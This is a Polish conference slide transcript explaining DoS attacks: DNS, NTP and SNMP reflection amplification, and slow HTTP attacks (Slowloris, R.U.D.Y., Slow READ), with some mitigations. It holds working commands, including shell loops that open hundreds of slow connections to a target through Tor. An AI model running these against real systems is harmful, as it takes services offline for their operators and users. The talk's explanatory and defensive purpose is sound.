Rentgen współczesnych ataków DoS. Marcin Ulikowski Network Engineer, Atos IT Services

Transkrypt

1 Rentgen współczesnych ataków DoS Marcin Ulikowski Network Engineer, Atos IT Services

2 Distributed Reflected Denial of Service Ataki wolumetryczne (odbite wzmocnione) 2

3 3

4 4

5 Brak weryfikacji adresu źródłowego (IP spoofing) Protokół bezpołączeniowy UDP jako transport Popularna i dostępna usługa Brak autoryzacji na poziomie aplikacji Zapytanie Odpowiedź 5

6 Otwarte serwery DNS 6

7 Rozszerzenie EDNS0 Odpowiedzi >512B dig. +edns=0 +bufsize=4096 Open DNS resolver ( ) Maksymalny akceptowalny rozmiar odpowiedzi 7

8 IP (tos 0x0, ttl 64, id 5550, offset 0, flags [none], proto UDP (17), length 56) > : [1au] ANY?. (28) IP (tos 0x40, ttl 61, id 58532, offset 0, flags [+], proto UDP (17), length 1500) > : /13/22. RRSIG,. SOA a.root-servers.net. nstld.verisign-grs.com ,. RRSIG,. NS d.rootservers.net.,. NS l.root-servers.net.,. NS b.root-servers.net.,. NS k.rootservers.net.,. NS g.root-servers.net.,. NS a.root-servers.net.,. NS j.rootservers.net.,. NS h.root-servers.net.,. NS e.root-servers.net.,. NS f.rootservers.net.,. NS m.root-servers.net.,. NS c.root-servers.net.,. NS i.rootservers.net.,. RRSIG,. NSEC,. RRSIG,. DNSKEY,. DNSKEY[ domain] IP (tos 0x40, ttl 61, id 58532, offset 1480, flags [none], proto UDP (17), length 651) > : ip-proto

9 $ dig plugawyszuwarek.pl NAPTR +short +notcp +edns=0 +bufsize=4096 sort "" ".-. " "" "" " ( ) " "" "" " '-' " "" "" " J L " "" "" " " "" "" " J L " "" "" " " "" "" " J L " "" "" ".-'..'-. " "" "" " / " "" "" " _.-''' `bmw._ " "" "" ".' `. " "" "" " J `. " "" "" " F L " "" "" " J J " "" "" " J ` " "" "" " L " "" "" " " "" "" " " "" "" " J " "" "" " L " "" "" " " "" "" ", _ " "" "" ",' `''''''''' `-._ " "" "" " J `-. " "" "" " F.-' ` ' `Y8888b.`. " "" "" ".' `P' `88888b " "" "" " J # L # q8888b L " "" "" " )8888D ) " "" "" " J J d8888p P " "" "" " L `..b.,88888p / " "" "" " `. `-.,o88888o.,o88888p'.' " "" "" " `-...-' " "" "" " " "" "" " J " "" "" ".' " "" "" " J " "" "" " " "" "" " Y " "" "" " `. " "" "" " `' :....J " "" "" " " "" "" " L " "" "" " '' ' " "". 9

10 IN ANY plugawyszuwarek.pl? 10

11 11 Źródło: Open Resolver Project

12 1 Mbps /8 ( ) <ROOT> IN ANY? EDNS0 3:00h ~ Spamhaus DDoS < % rekursywnych odpowiedzi EDNS0 76% 12

13 Otwarte serwery NTP 13

14 ntpdc -c monlist Diagnostyczna komenda protokołu NTP służąca do pobrania listy do 600 ostatnich hostów z którymi łączył się serwer czasu. 14

15 $ ntpdc -n -c monlist remote address port local address count m ver rstr avgint lstint ===============================================================================

16 18:05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length

17 IP + UDP + NTP 440B (6 hostów) Max liczba pakietów Standardowa długość zapytania MON_GETLIST (payload NTP 192B) 17

18 18

19 IP 20B + UDP 8B + NTP 192B 8B 19

20 1 Mbps 57 prefiksów OVH 8B NTP MON_GETLIST 0:15h 1964 serwerów NTP 979 wspiera MON_GETLIST 20

21 Publiczne serwery SNMP 21

22 Ilość obiektów do pobrania Object ID snmpbulkget -Cr c public iso Dostępne dla SNMPv2 i SNMPv3 community string 22

23 $ snmpbulkget Cr3000 -v2c public iso iso = STRING: "Hardware: x86 Family 15 Model 79 Stepping 2 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)" iso = OID: iso iso = Timeticks: ( ) 2 days, 14:22:05.62 iso = "" iso = STRING: "MICROSOF-D48508" iso = "" iso = INTEGER: 76 iso = INTEGER: 2 iso = INTEGER: 1 iso = INTEGER: 2 iso = Hex-STRING: 4D C 6F 6F B E iso = Hex-STRING: F C E F F D F 6E F 6C 6C D 20 CC E8 ED E8 EF EE F0 F2 20 EF EB E0 ED E8 F0 EE E2 F9 E8 EA E0 20 EF E0 EA E5 F2 EE E2 00 iso = INTEGER: 24 iso = INTEGER: 6 iso = INTEGER: 1520 iso = INTEGER: 1500 iso = Gauge32: iso = Gauge32: iso = "" iso = Hex-STRING: 00 1A FC FC iso = INTEGER: 1 iso = INTEGER: 1 iso = INTEGER: 1 iso = INTEGER: 1 iso = Timeticks: (0) 0:00:00.00 (... ) iso = No more variables left in this MIB View (It is past the end of the MIB tree) 23

24 IP (tos 0x0, ttl 64, id 58102, offset 0, flags [DF], proto UDP (17), length 68) > : { SNMPv2c { GetBulk(25) R= N=0 M= } } IP (tos 0x0, ttl 122, id 60908, offset 0, flags [+], proto UDP (17), length 1500) > : [len1468<asnlen61313] IP (tos 0x0, ttl 122, id 60908, offset 1480, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 2960, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 4440, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 5920, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 7400, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 8880, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 10360, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 11840, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 13320, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 14800, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 16280, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 17760, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 19240, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 20720, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 22200, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 23680, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 25160, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 26640, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 28120, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 29600, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 31080, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 32560, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 34040, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 35520, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 37000, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 38480, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 39960, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 41440, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 42920, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 44400, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 45880, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 47360, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 48840, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 50320, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 51800, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 53280, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 54760, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 56240, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 57720, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 59200, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 60680, flags [none], proto UDP (17), length 665) > : ip-proto-17 24

25

26 1 Mbps /8 snmpbulkget v2c c public 3:00h serwerów SNMP Średnia długość odpowiedzi:

27 Wyłącz zbędne usługi Schowaj się za kimś większym (CDN) Filtrowanie ruchu (BCP-38) Rozproszone usługi Dobre relacje z ISP 27

28 Slow HTTP Denial of Service Ataki na warstwę aplikacji 28

29 Bardzo łatwe do przeprowadzenia Trudne do wykrycia przez systemy IDS Nie wymagają dużej przepustowości łącza Nie wymagają botnet-u Możliwe do ukrycia (Tor) 29

30 30

31 Slowloris 31

32 $ nc plugawyszuwarek.pl 80 GET / HTTP/1.1 Host: plugawyszuwarek.pl Connection: keep-alive Accept-Charset: utf8 Accept-language: pl, en-us User-Agent: netcat Brak pustego wiersza HTTP/ Request Time-Out 32

33 Liczba połączeń wątków HTTP Nagłówek HTTP for i in `seq 300`; do ( echo -e "GET / HTTP/1.1\nHost: plugawyszuwarek.pl" nc -X 5 -x :9050 plugawyszuwarek.pl 80 -q 300 & ) ; done Tor proxy Czas trwania sesji TCP Autor nie ponosi odpowiedzialności za niezgodne z prawem wykorzystanie powyższego kodu oraz za wszelkiego rodzaju szkody wyrządzone z jego użyciem. 33

34 R.U.D.Y (R U Dead Yet?) 34

35 $ nc plugawyszuwarek.pl 80 POST / HTTP/1.1 Host: plugawyszuwarek.pl Content-length: \r\n 1=1& 2=2& 3=3& 4=4& 5=5& 35

36 for i in `seq 300`; do ( ( echo -e "POST / HTTP/1.1\nHost: plugawyszuwarek.pl\ncontent-length: \n\n"; for j in `seq 600`; do echo $j=$j\&; sleep 5; done ) nc -X 5 -x :9050 plugawyszuwarek.pl 80 & ); done Autor nie ponosi odpowiedzialności za niezgodne z prawem wykorzystanie powyższego kodu oraz za wszelkiego rodzaju szkody wyrządzone z jego użyciem. 36

37 Slow HTTP READ 37

38 38

39 Po otrzymaniu segmentu, okno TCP odbiorcy - czyli atakującego - jest pełne Rozmiar obiektu większy niż bufor nadawczy serwera Atakujący ustawia rozmiar okna TCP na 0 Serwer stara się podtrzymać sesję TCP 39

40 Czekaj na nagłówek (oraz SSL handshake) do 20s. Jeśli klient przesyła nagłówki z prędkością min. 500B/s czekaj kolejne 20s. <IfModule mod_reqtimeout.c> RequestReadTimeout header=20-40,minrate=500 body=20,minrate=500 </IfModule> Czekaj na dane do 20s. Nie przerywaj połączenia, jeśli klient dosyła dane z prędkością min. 500B/s. 40

41 41